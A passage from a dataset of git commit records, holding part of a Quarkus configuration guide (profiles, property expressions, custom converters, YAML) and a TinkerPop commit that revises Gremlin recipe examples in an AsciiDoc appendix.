`QUARKUS_PROFILE` environment variable to `staging` to activate my profile.\n\n[NOTE]\n====\nThe proper way to check the active profile programmatically is to use the `getActiveProfile` method of `io.quarkus.runtime.configuration.ProfileManager`.\n\nUsing `@ConfigProperty(\"quarkus.profile\")` will *not* work properly.\n====
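\n\nA minimal sketch of such a programmatic check (the surrounding class and any logging are omitted for brevity):\n\n[source,java]\n----\nimport io.quarkus.runtime.configuration.ProfileManager;\n\n\/\/ Returns the name of the active profile, e.g. \"dev\", \"test\", \"prod\" or \"staging\".\nString profile = ProfileManager.getActiveProfile();\n----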
\n\n=== Using Property Expressions\n\nQuarkus supports the use of property expressions in the `application.properties` file.\n\nThese expressions are resolved when the property is read.\nSo if your configuration property is a build time configuration property, the property expression will be resolved at build time.\nIf your configuration property is overridable at runtime, the property expression will be resolved at runtime.\n\nYou can use property expressions both for the Quarkus configuration and for your own configuration properties.\n\nProperty expressions are defined this way: `${my-property-expression}`.\n\nFor example, having the following property:\n\n[source,properties]\n----\nremote.host=quarkus.io\n----\nand another property defined as:\n\n[source,properties]\n----\ncallable.url=https:\/\/${remote.host}\/\n----\n\nwill result in the value of the `callable.url` property being set to:\n\n[source,properties]\n----\ncallable.url=https:\/\/quarkus.io\/\n----\n\nAnother example would be defining different database servers depending on the profile used:\n\n[source,properties]\n----\n%dev.quarkus.datasource.url=jdbc:mysql:\/\/localhost:3306\/mydatabase?useSSL=false\nquarkus.datasource.url=jdbc:mysql:\/\/remotehost:3306\/mydatabase?useSSL=false\n----\n\ncan be simplified by having:\n\n[source,properties]\n----\n%dev.application.server=localhost\napplication.server=remotehost\n\nquarkus.datasource.url=jdbc:mysql:\/\/${application.server}:3306\/mydatabase?useSSL=false\n----\n\nIt does result in one more line in this example, but the value of `application.server` can be reused in other properties,\ndiminishing the possibility of typos and providing more flexibility in property definitions.\n\n=== Combining Property Expressions and Environment Variables\n\nQuarkus also supports the combination of both property expressions and environment variables.\n\nLet's assume you have the following property defined in `application.properties`:\n\n[source,properties]\n----\nremote.host=quarkus.io\n----\n\nYou can combine environment variables and property expressions by having a property defined as follows:\n\n[source,properties]\n----\napplication.host=${HOST:${remote.host}}\n----\n\nThis will expand the `HOST` environment variable and use the value of the property `remote.host` as the default value if `HOST` is not set.\n\nFor the purpose of this section, we used the property `remote.host` we defined previously.\nNote that the default could also have been a fixed value, such as in:\n\n[source,properties]\n----\napplication.host=${HOST:localhost}\n----\n\nwhich will result in `localhost` as the default value if `HOST` is not set.\n\n=== Clearing properties\n\nRun time properties which are optional, and which have had values set at build time or which have a default value,\nmay be explicitly cleared by assigning an empty string to the property. Note that this will _only_ affect\nrun time properties, and will _only_ work with properties whose values are not required.\n\nThe property may be cleared by setting the corresponding `application.properties` property, setting the\ncorresponding system property, or setting the corresponding environment variable.
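\n\nFor example, an optional runtime property that received a value at build time could be cleared at runtime like this (the property name is purely illustrative):\n\n[source,properties]\n----\n# An empty value clears the optional runtime property:\nquarkus.datasource.password=\n----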
\n\n==== Miscellaneous\nThe default Quarkus application runtime profile is set to the profile used to build the application.\nFor example:\n[source,shell]\n----\n.\/mvnw package -Pnative -Dquarkus.profile=prod-aws\n.\/target\/my-app-1.0-runner \/\/ <1>\n----\n<1> The command will run with the `prod-aws` profile. This can be overridden using the `quarkus.profile` system property.\n\n== Custom Configuration\n\n=== Custom configuration sources\n\nYou can also introduce custom configuration sources in the standard MicroProfile Config manner. To\ndo this, you must provide a class which implements either `org.eclipse.microprofile.config.spi.ConfigSource`\nor `org.eclipse.microprofile.config.spi.ConfigSourceProvider`. Create a\nhttps:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/ServiceLoader.html[service file] for the\nclass and it will be detected and installed at application startup.\n\n=== Custom configuration converters\n\nYou can also use your custom types as configuration values. This can be done by implementing `org.eclipse.microprofile.config.spi.Converter<T>`\nand adding its fully qualified class name to the `META-INF\/services\/org.eclipse.microprofile.config.spi.Converter` file.\n\nLet us assume you have a custom type like this one:\n\n[source,java]\n----\npackage org.acme.config;\n\npublic class MicroProfileCustomValue {\n\n private final int number;\n\n public MicroProfileCustomValue(int number) {\n this.number = number;\n }\n\n public int getNumber() {\n return number;\n }\n}\n----\n\nThe corresponding converter will look like the one below. Please note that your custom converter class must be `public` and must have\na `public` no-argument constructor. It also must not be `abstract`.\n\n\n[source,java]\n----\npackage org.acme.config;\n\nimport org.eclipse.microprofile.config.spi.Converter;\n\npublic class MicroProfileCustomValueConverter implements Converter<MicroProfileCustomValue> {\n\n @Override\n public MicroProfileCustomValue convert(String value) {\n return new MicroProfileCustomValue(Integer.valueOf(value));\n }\n}\n----\n\nThen you need to include the fully qualified class name of the converter in a service file `META-INF\/services\/org.eclipse.microprofile.config.spi.Converter`.\nIf you have more converters, simply add their class names to this file as well, one fully qualified class name per line, for example:\n\n[source]\n----\norg.acme.config.MicroProfileCustomValueConverter\norg.acme.config.SomeOtherConverter\norg.acme.config.YetAnotherConverter\n----\n\nPlease note that `SomeOtherConverter` and `YetAnotherConverter` were added just for demonstration. If you include classes in this file\nwhich are not available at runtime, the converter loading will fail.\n\nAfter this is done, you can use your custom type as a configuration value:\n\n[source,java]\n----\n@ConfigProperty(name = \"configuration.value.name\")\nMicroProfileCustomValue value;\n----
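\n\nWith the converter registered, a minimal sketch of the corresponding entry in `application.properties` could look like this (the property name and value are illustrative):\n\n[source,properties]\n----\n# Converted to a MicroProfileCustomValue by the registered converter:\nconfiguration.value.name=42\n----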
\n\n==== Converter priority\n\nIn some cases, you may want to use a custom converter to convert a type which is already converted\nby a different converter. In such cases, you can use the `javax.annotation.Priority` annotation to\nchange converter precedence and make your custom converter of higher priority than the existing one.\n\nBy default, if no `@Priority` can be found on a converter, it's registered with a priority of 100,\nand all Quarkus core converters are registered with a priority of 200, so depending on which\nconverter you would like to replace, you need to set a higher value.\n\nTo demonstrate the idea, let us implement a custom converter which will take precedence over\n`MicroProfileCustomValueConverter` implemented in the previous example.\n\n[source,java]\n----\npackage org.acme.config;\n\nimport javax.annotation.Priority;\nimport org.eclipse.microprofile.config.spi.Converter;\n\n@Priority(150)\npublic class MyCustomConverter implements Converter<MicroProfileCustomValue> {\n\n @Override\n public MicroProfileCustomValue convert(String value) {\n\n final int secretNumber;\n if (value.startsWith(\"OBF:\")) {\n secretNumber = Integer.valueOf(SecretDecoder.decode(value));\n } else {\n secretNumber = Integer.valueOf(value);\n }\n\n return new MicroProfileCustomValue(secretNumber);\n }\n}\n----\n\nSince it converts the same value type (namely `MicroProfileCustomValue`) and has a priority\nof 150, it will be used instead of `MicroProfileCustomValueConverter`, which has a default\npriority of 100.\n\nNOTE: This new converter also needs to be listed in a service file, i.e. `META-INF\/services\/org.eclipse.microprofile.config.spi.Converter`.\n\n[[yaml]]\n== YAML for Configuration\n\n=== Add YAML Config Support\n\nYou might want to use YAML over properties for configuration.\nSince link:https:\/\/github.com\/smallrye\/smallrye-config[SmallRye Config] brings support for YAML\nconfiguration, Quarkus supports this as well.\n\nFirst you will need to add the YAML extension to your `pom.xml`:\n\n[source,xml]\n----\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-config-yaml<\/artifactId>\n<\/dependency>\n----\n\nOr you can alternatively run this command in the directory containing your Quarkus project:\n\n[source,bash]\n----\n.\/mvnw quarkus:add-extension -Dextensions=\"config-yaml\"\n----\n\nNow Quarkus can read YAML configuration files.\nThe config directories and priorities are the same as before.\n\nNOTE: Quarkus will choose an `application.yaml` over an `application.properties`.\nYAML files are just an alternative way to configure your application.\nYou should pick one configuration format and stick to it to avoid errors.\n\n==== Configuration Examples\n[source,yaml]\n----\n# YAML supports comments\nquarkus:\n datasource:\n url: jdbc:postgresql:\/\/localhost:5432\/some-database\n driver: org.postgresql.Driver\n username: quarkus\n password: quarkus\n\n# REST Client configuration property\norg:\n acme:\n restclient:\n CountriesService\/mp-rest\/url: https:\/\/restcountries.eu\/rest\n\n# For configuration property names that use quotes, do not split the string inside the quotes.\nquarkus:\n log:\n category:\n \"io.quarkus.category\":\n level: INFO\n----\n\n[NOTE]\n====\nQuarkus also supports using `application.yml` as the name of the YAML file. The same rules apply for this file as for `application.yaml`.\n====
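\n\nFor orientation, the nested YAML keys map one-to-one onto the flat `.`-delimited property names; the datasource block above is equivalent to this `application.properties` sketch:\n\n[source,properties]\n----\nquarkus.datasource.url=jdbc:postgresql:\/\/localhost:5432\/some-database\nquarkus.datasource.driver=org.postgresql.Driver\nquarkus.datasource.username=quarkus\nquarkus.datasource.password=quarkus\n----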
\n\n=== Profile dependent configuration\n\nProviding profile dependent configuration with YAML is done in the same way as with properties.\nJust add the `%profile`, wrapped in quotation marks, before defining the key-value pairs:\n\n[source,yaml]\n----\n\"%dev\":\n quarkus:\n datasource:\n url: jdbc:postgresql:\/\/localhost:5432\/some-database\n driver: org.postgresql.Driver\n username: quarkus\n password: quarkus\n----\n\n=== Configuration key conflicts\n\nThe MicroProfile Configuration specification defines configuration keys as an arbitrary `.`-delimited string.\nHowever, structured formats like YAML naively only support a subset of the possible configuration namespace.\nFor example, consider the two configuration properties `quarkus.http.cors` and `quarkus.http.cors.methods`.\nOne property is the prefix of another, so it may not be immediately evident how to specify both keys in your YAML configuration.\n\nThis is solved by using a null key (normally represented by `~`) for any YAML property which is a prefix of another one. Here's an example:\n\n.An example YAML configuration resolving prefix-related key name conflicts\n[source,yaml]\n----\nquarkus:\n http:\n cors:\n ~: true\n methods: GET,PUT,POST\n----\n\nIn general, null YAML keys are not included in the assembly of the configuration property name, allowing them to be used at\nany level for disambiguating configuration keys.\n\n== More info on how to configure\n\nQuarkus relies on SmallRye Config and inherits its features.\n\nSmallRye Config provides:\n\n* Additional Config Sources\n* Additional Converters\n* Interceptors for configuration value resolution\n* Relocate Configuration Properties\n* Fallback Configuration Properties\n* Logging\n* Hide Secrets\n\nFor more information, please check the\nlink:https:\/\/smallrye.io\/docs\/smallrye-config\/index.html[SmallRye Config documentation].\n","old_contents":"",
The same rules apply for this file as for `application.yaml`.\n====\n\n=== Profile dependent configuration\n\nProviding profile-dependent configuration with YAML works the same way as with properties.\nJust add the `%profile`, wrapped in quotation marks, before defining the key-value pairs:\n\n[source,yaml]\n----\n\"%dev\":\n  quarkus:\n    datasource:\n      url: jdbc:postgresql:\/\/localhost:5432\/some-database\n      driver: org.postgresql.Driver\n      username: quarkus\n      password: quarkus\n----\n\n=== Configuration key conflicts\n\nThe MicroProfile Configuration specification defines configuration keys as an arbitrary `.`-delimited string.\nHowever, structured formats like YAML natively only support a subset of the possible configuration namespace.\nFor example, consider the two configuration properties `quarkus.http.cors` and `quarkus.http.cors.methods`.\nOne property is the prefix of the other, so it may not be immediately evident how to specify both keys in your YAML configuration.\n\nThis is solved by using a null key (normally represented by `~`) for any YAML property which is a prefix of another one. Here is an example:\n\n.An example YAML configuration resolving prefix-related key name conflicts\n[source,yaml]\n----\nquarkus:\n  http:\n    cors:\n      ~: true\n      methods: GET,PUT,POST\n----\n\nIn general, null YAML keys are not included in the assembly of the configuration property name, allowing them to be used at\nany level to disambiguate configuration keys.\n\n== More info on how to configure\n\nQuarkus relies on SmallRye Config and inherits its features.\n\nSmallRye Config provides:\n\n* Additional Config Sources\n* Additional Converters\n* Interceptors for configuration value resolution\n* Relocate Configuration Properties\n* Fallback Configuration Properties\n* Logging\n* Hide Secrets\n\nFor more information, please check the\nlink:https:\/\/smallrye.io\/docs\/smallrye-config\/index.html[SmallRye Config documentation].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9cdc47c3876ab3326de096a66228ccd43d8a42ca","subject":"optimized math examples","message":"optimized math examples\n","repos":"krlohnes\/tinkerpop,apache\/incubator-tinkerpop,artem-aliev\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,artem-aliev\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,jorgebay\/tinkerpop,artem-aliev\/tinkerpop,pluradj\/incubator-tinkerpop,artem-aliev\/tinkerpop,robertdale\/tinkerpop,jorgebay\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/incubator-tinkerpop,apache\/incubator-tinkerpop,krlohnes\/tinkerpop,apache\/tinkerpop,artem-aliev\/tinkerpop,robertdale\/tinkerpop,jorgebay\/tinkerpop,jorgebay\/tinkerpop,krlohnes\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop","old_file":"docs\/src\/recipes\/appendix.asciidoc","new_file":"docs\/src\/recipes\/appendix.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. 
You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\nAppendix\n========\n\nMany of the recipes are based on questions and answers provided on the\nlink:https:\/\/groups.google.com\/forum\/#!forum\/gremlin-users[gremlin-users mailing list] or on\nlink:http:\/\/stackoverflow.com\/questions\/tagged\/gremlin[StackOverflow]. This section contains those traversals from\nthose sources that do not easily fit any particular pattern (i.e. a recipe), but are nonetheless interesting and thus\nremain good tools for learning Gremlin.\n\n[[appendix-a]]\n_For each person in a \"follows\" graph, determine the number of followers and list their names._\n\n[gremlin-groovy]\n----\ng.addV('name','marko').as('marko').\n addV('name','josh').as('josh').\n addV('name','daniel').as('daniel').\n addV('name','matthias').as('matthias').\n addE('follows').from('josh').to('marko').\n addE('follows').from('matthias').to('josh').\n addE('follows').from('daniel').to('josh').\n addE('follows').from('daniel').to('marko').iterate()\ng.V().as('p').\n map(__.in('follows').values('name').fold()).\n project('person','followers','numFollowers').\n by(select('p').by('name')).\n by().\n by(count(local))\n----\n\nIt might also be alternatively written as:\n\n[gremlin-groovy,existing]\n----\ng.V().group().\n by('name').\n by(project('numFollowers','followers').\n by(__.in('follows').count()).\n by(__.in('follows').values('name').fold())).next()\n----\n\nor even:\n\n[gremlin-groovy,existing]\n----\ng.V().group().\n by('name').\n by(__.in('follows').values('name').fold().\n project('numFollowers','followers').\n by(count(local)).\n by()).next()\n----\n\n[[appendix-b]]\n_In the \"modern\" graph, show each person, the software they worked on and the co-worker count for the software and\nthe names of those co-workers._\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel(\"person\").as(\"p\").\n out(\"created\").as(\"s\").\n map(__.in(\"created\").\n where(neq(\"p\")).values(\"name\").fold()).\n group().by(select(\"p\").by(\"name\")).\n by(group().by(select(\"s\").by(\"name\")).\n by(project(\"numCoworkers\",\"coworkers\").\n by(count(local)).by())).next()\n----\n\n[[appendix-c]]\n_Assuming a graph of students, classes and times, detect students who have a conflicting schedule._\n\n[gremlin-groovy]\n----\ng.addV(label, \"student\", \"name\", \"Pete\").as(\"s1\").\n addV(label, \"student\", \"name\", \"Joe\").as(\"s2\").\n addV(label, \"class\", \"name\", \"Java's GC\").as(\"c1\").\n addV(label, \"class\", \"name\", \"FP Principles\").as(\"c2\").\n addV(label, \"class\", \"name\", \"Memory Management in C\").as(\"c3\").\n addV(label, \"class\", \"name\", \"Memory Management in C++\").as(\"c4\").\n addV(label, \"timeslot\", \"date\", \"11\/25\/2016\", \"fromTime\", \"10:00\", \"toTime\", \"11:00\").as(\"t1\").\n addV(label, \"timeslot\", \"date\", \"11\/25\/2016\", \"fromTime\", \"11:00\", \"toTime\", \"12:00\").as(\"t2\").\n addE(\"attends\").from(\"s1\").to(\"c1\").\n addE(\"attends\").from(\"s1\").to(\"c2\").\n addE(\"attends\").from(\"s1\").to(\"c3\").\n addE(\"attends\").from(\"s1\").to(\"c4\").\n addE(\"attends\").from(\"s2\").to(\"c2\").\n 
addE(\"attends\").from(\"s2\").to(\"c3\").\n  addE(\"allocated\").from(\"c1\").to(\"t1\").\n  addE(\"allocated\").from(\"c1\").to(\"t2\").\n  addE(\"allocated\").from(\"c2\").to(\"t1\").\n  addE(\"allocated\").from(\"c3\").to(\"t2\").\n  addE(\"allocated\").from(\"c4\").to(\"t2\").iterate()\ng.V().hasLabel(\"student\").as(\"s\").\n  out(\"attends\").as(\"c\").\n  out(\"allocated\").as(\"t\").\n  select(\"s\").\n  out(\"attends\").\n  where(neq(\"c\")).\n  out(\"allocated\").\n  where(eq(\"t\")).\n  group().\n    by(select(\"s\").by(\"name\")).\n    by(group().by(select(\"t\").by(valueMap(\"fromTime\",\"toTime\"))).\n    by(select(\"c\").dedup().values(\"name\").fold())).next()\n----\n\n[[appendix-d]]\n_In the \"modern\" graph, with a duplicate edge added, find the vertex pairs that have more than one edge between them._\n\n[gremlin-groovy,modern]\n----\ng.V(1).as(\"a\").V(3).addE(\"created\").property(\"weight\",0.4d).from(\"a\").iterate()\ng.V(1).outE(\"created\")\ng.V().as(\"a\").\n  out().as(\"b\").\n  groupCount().\n    by(select(\"a\",\"b\")).\n  unfold().\n  filter(select(values).is(gt(1))).\n  select(keys)\n----\n\nThe example above assumes that the edges point in the `OUT` direction. Assuming undirected edges:\n\n[gremlin-groovy,modern]\n----\ng.V().where(without(\"x\")).as(\"a\").\n  outE().as(\"e\").inV().as(\"b\").\n  filter(bothE().where(neq(\"e\")).otherV().where(eq(\"a\"))).store(\"x\").\n  select(\"a\",\"b\").dedup()\n----\n\n[[appendix-e]]\n_In the \"crew\" graph, find vertices that match on a complete set of multi-properties._\n\n[gremlin-groovy,theCrew]\n----\nplaces = [\"centreville\",\"dulles\"];[] \/\/ will not match as \"purcellville\" is missing\ng.V().not(has(\"location\", without(places))).\n  where(values(\"location\").is(within(places)).count().is(places.size())).\n  valueMap()\nplaces = [\"centreville\",\"dulles\",\"purcellville\"];[]\ng.V().not(has(\"location\", without(places))).\n  where(values(\"location\").is(within(places)).count().is(places.size())).\n  valueMap()\n----\n\n[[appendix-f]]\n_Methods for performing some basic mathematical operations in the \"modern\" graph._\n\n[gremlin-groovy,modern]\n----\ng.V().values(\"age\").sum() \/\/ sum all ages\ng.V().values(\"age\").fold(1, mult) \/\/ multiply all ages\ng.withSack(0).V().values(\"age\").sack(sum).sack(sum).by(constant(-1)).sack() \/\/ subtract 1\ng.withSack(0).V().values(\"age\").sack(sum).sack(sum).sack() \/\/ multiply by 2 (simple)\ng.withSack(0).V().values(\"age\").sack(sum).sack(mult).by(constant(2)).sack() \/\/ multiply by 2 (generally useful for multiplications by n)\n----\n\n[[appendix-g]]\n_Dropping a vertex, as well as the vertices related to that dropped vertex that are connected by a \"knows\" edge in the\n\"modern\" graph_\n\n[gremlin-groovy,modern]\n----\ng.V().has('name','marko').outE()\ng.V().has('name','marko').sideEffect(out('knows').drop()).drop()\ng.V().has('name','marko')\ng.V(2,4,3)\n----\n\n[[appendix-h]]\n_For the specified graph, find all neighbor vertices connected to \"A\" as filtered by datetime, those neighbor vertices\nthat don't have datetime vertices, and those neighbor vertices that have the label \"dimon\"._\n\n[gremlin-groovy]\n----\ng.addV().property(\"name\", \"A\").as(\"a\").\n  addV().property(\"name\", \"B\").as(\"b\").\n  addV().property(\"name\", \"C\").as(\"c\").\n  addV().property(\"name\", \"D\").as(\"d\").\n  addV().property(\"name\", \"E\").as(\"e\").\n  addV(\"dimon\").property(\"name\", \"F\").as(\"f\").\n  addV().property(\"name\", \"G\").as(\"g\").property(\"date\", 20160818).\n  
addV().property(\"name\", \"H\").as(\"h\").property(\"date\", 20160817).\n addE(\"rel\").from(\"a\").to(\"b\").\n addE(\"rel\").from(\"a\").to(\"c\").\n addE(\"rel\").from(\"a\").to(\"d\").\n addE(\"rel\").from(\"a\").to(\"e\").\n addE(\"rel\").from(\"c\").to(\"f\").\n addE(\"occured_at\").from(\"d\").to(\"g\").\n addE(\"occured_at\").from(\"e\").to(\"h\").iterate()\n\/\/ D and E have a valid datetime\ng.V().has(\"name\", \"A\").out(\"rel\").\n union(where(out(\"occured_at\").has(\"date\", gte(20160817))),\n __.not(outE(\"occured_at\")).coalesce(out().hasLabel(\"dimon\"), identity())).\n valueMap()\n\/\/ only E has a valid date\ng.V().has(\"name\", \"A\").out(\"rel\").\n union(where(out(\"occured_at\").has(\"date\", lte(20160817))),\n __.not(outE(\"occured_at\")).coalesce(out().hasLabel(\"dimon\"), identity())).\n valueMap()\n\/\/ only D has a valid date\ng.V().has(\"name\", \"A\").out(\"rel\").\n union(where(out(\"occured_at\").has(\"date\", gt(20160817))),\n __.not(outE(\"occured_at\")).coalesce(out().hasLabel(\"dimon\"), identity())).\n valueMap()\n\/\/ neither D nor E have a valid date\ng.V().has(\"name\", \"A\").out(\"rel\").\n union(where(out(\"occured_at\").has(\"date\", lt(20160817))),\n __.not(outE(\"occured_at\")).coalesce(out().hasLabel(\"dimon\"), identity())).\n valueMap()\n----\n\n[[appendix-i]]\n_Use element labels in a `select`._\n\n[gremlin-groovy,modern]\n----\ng.V(1).as(\"a\").\n both().\n map(group().by(label).by(unfold())).as(\"b\").\n select(\"a\",\"b\").\n map(union(project(\"a\").by(select(\"a\")), select(\"b\")).\n unfold().\n group().\n by(select(keys)).\n by(select(values)))\ng.V().as(\"a\").\n both().\n map(group().by(label).by(unfold())).as(\"b\").\n select(\"a\",\"b\").\n group().\n by(select(\"a\")).\n by(select(\"b\").\n group().\n by(select(keys)).\n by(select(values).fold())).\n unfold().\n map(union(select(keys).project(\"a\").by(), select(values)).\n unfold().\n group().\n by(select(keys).unfold()).\n by(select(values).unfold().unfold().fold()))\n----\n","old_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\nAppendix\n========\n\nMany of the recipes are based on questions and answers provided on the\nlink:https:\/\/groups.google.com\/forum\/#!forum\/gremlin-users[gremlin-users mailing list] or on\nlink:http:\/\/stackoverflow.com\/questions\/tagged\/gremlin[StackOverflow]. This section contains those traversals from\nthose sources that do not easily fit any particular pattern (i.e. 
a recipe), but are nonetheless interesting and thus\nremain good tools for learning Gremlin.\n\n[[appendix-a]]\n_For each person in a \"follows\" graph, determine the number of followers and list their names._\n\n[gremlin-groovy]\n----\ng.addV('name','marko').as('marko').\n addV('name','josh').as('josh').\n addV('name','daniel').as('daniel').\n addV('name','matthias').as('matthias').\n addE('follows').from('josh').to('marko').\n addE('follows').from('matthias').to('josh').\n addE('follows').from('daniel').to('josh').\n addE('follows').from('daniel').to('marko').iterate()\ng.V().as('p').\n map(__.in('follows').values('name').fold()).\n project('person','followers','numFollowers').\n by(select('p').by('name')).\n by().\n by(count(local))\n----\n\nIt might also be alternatively written as:\n\n[gremlin-groovy,existing]\n----\ng.V().group().\n by('name').\n by(project('numFollowers','followers').\n by(__.in('follows').count()).\n by(__.in('follows').values('name').fold())).next()\n----\n\nor even:\n\n[gremlin-groovy,existing]\n----\ng.V().group().\n by('name').\n by(__.in('follows').values('name').fold().\n project('numFollowers','followers').\n by(count(local)).\n by()).next()\n----\n\n[[appendix-b]]\n_In the \"modern\" graph, show each person, the software they worked on and the co-worker count for the software and\nthe names of those co-workers._\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel(\"person\").as(\"p\").\n out(\"created\").as(\"s\").\n map(__.in(\"created\").\n where(neq(\"p\")).values(\"name\").fold()).\n group().by(select(\"p\").by(\"name\")).\n by(group().by(select(\"s\").by(\"name\")).\n by(project(\"numCoworkers\",\"coworkers\").\n by(count(local)).by())).next()\n----\n\n[[appendix-c]]\n_Assuming a graph of students, classes and times, detect students who have a conflicting schedule._\n\n[gremlin-groovy]\n----\ng.addV(label, \"student\", \"name\", \"Pete\").as(\"s1\").\n addV(label, \"student\", \"name\", \"Joe\").as(\"s2\").\n addV(label, \"class\", \"name\", \"Java's GC\").as(\"c1\").\n addV(label, \"class\", \"name\", \"FP Principles\").as(\"c2\").\n addV(label, \"class\", \"name\", \"Memory Management in C\").as(\"c3\").\n addV(label, \"class\", \"name\", \"Memory Management in C++\").as(\"c4\").\n addV(label, \"timeslot\", \"date\", \"11\/25\/2016\", \"fromTime\", \"10:00\", \"toTime\", \"11:00\").as(\"t1\").\n addV(label, \"timeslot\", \"date\", \"11\/25\/2016\", \"fromTime\", \"11:00\", \"toTime\", \"12:00\").as(\"t2\").\n addE(\"attends\").from(\"s1\").to(\"c1\").\n addE(\"attends\").from(\"s1\").to(\"c2\").\n addE(\"attends\").from(\"s1\").to(\"c3\").\n addE(\"attends\").from(\"s1\").to(\"c4\").\n addE(\"attends\").from(\"s2\").to(\"c2\").\n addE(\"attends\").from(\"s2\").to(\"c3\").\n addE(\"allocated\").from(\"c1\").to(\"t1\").\n addE(\"allocated\").from(\"c1\").to(\"t2\").\n addE(\"allocated\").from(\"c2\").to(\"t1\").\n addE(\"allocated\").from(\"c3\").to(\"t2\").\n addE(\"allocated\").from(\"c4\").to(\"t2\").iterate()\ng.V().hasLabel(\"student\").as(\"s\").\n out(\"attends\").as(\"c\").\n out(\"allocated\").as(\"t\").\n select(\"s\").\n out(\"attends\").\n where(neq(\"c\")).\n out(\"allocated\").\n where(eq(\"t\")).\n group().\n by(select(\"s\").by(\"name\")).\n by(group().by(select(\"t\").by(valueMap(\"fromTime\",\"toTime\"))).\n by(select(\"c\").dedup().values(\"name\").fold())).next()\n----\n\n[[appendix-d]]\n_In the \"modern\" graph, with a duplicate edge added, find the vertex pairs that have more than one edge between 
them._\n\n[gremlin-groovy,modern]\n----\ng.V(1).as(\"a\").V(3).addE(\"created\").property(\"weight\",0.4d).from(\"a\").iterate()\ng.V(1).outE(\"created\")\ng.V().as(\"a\").\n out().as(\"b\").\n groupCount().\n by(select(\"a\",\"b\")).\n unfold().\n filter(select(values).is(gt(1))).\n select(keys)\n----\n\nThe following example assumes that the edges point in the `OUT` direction. Assuming undirected edges:\n\n[gremlin-groovy,modern]\n----\ng.V().where(without(\"x\")).as(\"a\").\n outE().as(\"e\").inV().as(\"b\").\n filter(bothE().where(neq(\"e\")).otherV().where(eq(\"a\"))).store(\"x\").\n select(\"a\",\"b\").dedup()\n----\n\n[[appendix-e]]\n_In the \"crew\" graph, find vertices that match on a complete set of multi-properties._\n\n[gremlin-groovy,theCrew]\n----\nplaces = [\"centreville\",\"dulles\"];[] \/\/ will not match as \"purcellville\" is missing\ng.V().not(has(\"location\", without(places))).\n where(values(\"location\").is(within(places)).count().is(places.size())).\n valueMap()\nplaces = [\"centreville\",\"dulles\",\"purcellville\"];[]\ng.V().not(has(\"location\", without(places))).\n where(values(\"location\").is(within(places)).count().is(places.size())).\n valueMap()\n----\n\n[[appendix-f]]\n_Methods for performing some basic mathematical operations in the \"modern\" graph._\n\n[gremlin-groovy,modern]\n----\ng.V().values(\"age\").sum() \/\/ sum all ages\ng.V().values(\"age\").fold(1, mult) \/\/ multiply all ages\ng.V().values(\"age\").map(union(identity(), constant(-1)).sum()) \/\/ subtract 1\ng.V().values(\"age\").map(union(identity(), identity()).sum()) \/\/ multiply by 2 (simple)\ng.V().values(\"age\").map(union(identity(), constant(2)).fold(1, mult)) \/\/ multiply by 2 (generally useful for multiplications by n):\n----\n\n[[appendix-g]]\n_Dropping a vertex, as well as the vertices related to that dropped vertex that are connected by a \"knows\" edge in the\n\"modern\" graph_\n\n[gremlin-groovy,modern]\n----\ng.V().has('name','marko').outE()\ng.V().has('name','marko').sideEffect(out('knows').drop()).drop()\ng.V().has('name','marko')\ng.V(2,4,3)\n----\n\n[[appendix-h]]\n_For the specified graph, find all neighbor vertices connected to \"A\" as filtered by datetime, those neighbor vertices\nthat don't have datetime vertices, and those neighbor vertices that have the label \"dimon\"._\n\n[gremlin-groovy]\n----\ng.addV().property(\"name\", \"A\").as(\"a\").\n addV().property(\"name\", \"B\").as(\"b\").\n addV().property(\"name\", \"C\").as(\"c\").\n addV().property(\"name\", \"D\").as(\"d\").\n addV().property(\"name\", \"E\").as(\"e\").\n addV(\"dimon\").property(\"name\", \"F\").as(\"f\").\n addV().property(\"name\", \"G\").as(\"g\").property(\"date\", 20160818).\n addV().property(\"name\", \"H\").as(\"h\").property(\"date\", 20160817).\n addE(\"rel\").from(\"a\").to(\"b\").\n addE(\"rel\").from(\"a\").to(\"c\").\n addE(\"rel\").from(\"a\").to(\"d\").\n addE(\"rel\").from(\"a\").to(\"e\").\n addE(\"rel\").from(\"c\").to(\"f\").\n addE(\"occured_at\").from(\"d\").to(\"g\").\n addE(\"occured_at\").from(\"e\").to(\"h\").iterate()\n\/\/ D and E have a valid datetime\ng.V().has(\"name\", \"A\").out(\"rel\").\n union(where(out(\"occured_at\").has(\"date\", gte(20160817))),\n __.not(outE(\"occured_at\")).coalesce(out().hasLabel(\"dimon\"), identity())).\n valueMap()\n\/\/ only E has a valid date\ng.V().has(\"name\", \"A\").out(\"rel\").\n union(where(out(\"occured_at\").has(\"date\", lte(20160817))),\n __.not(outE(\"occured_at\")).coalesce(out().hasLabel(\"dimon\"), identity())).\n 
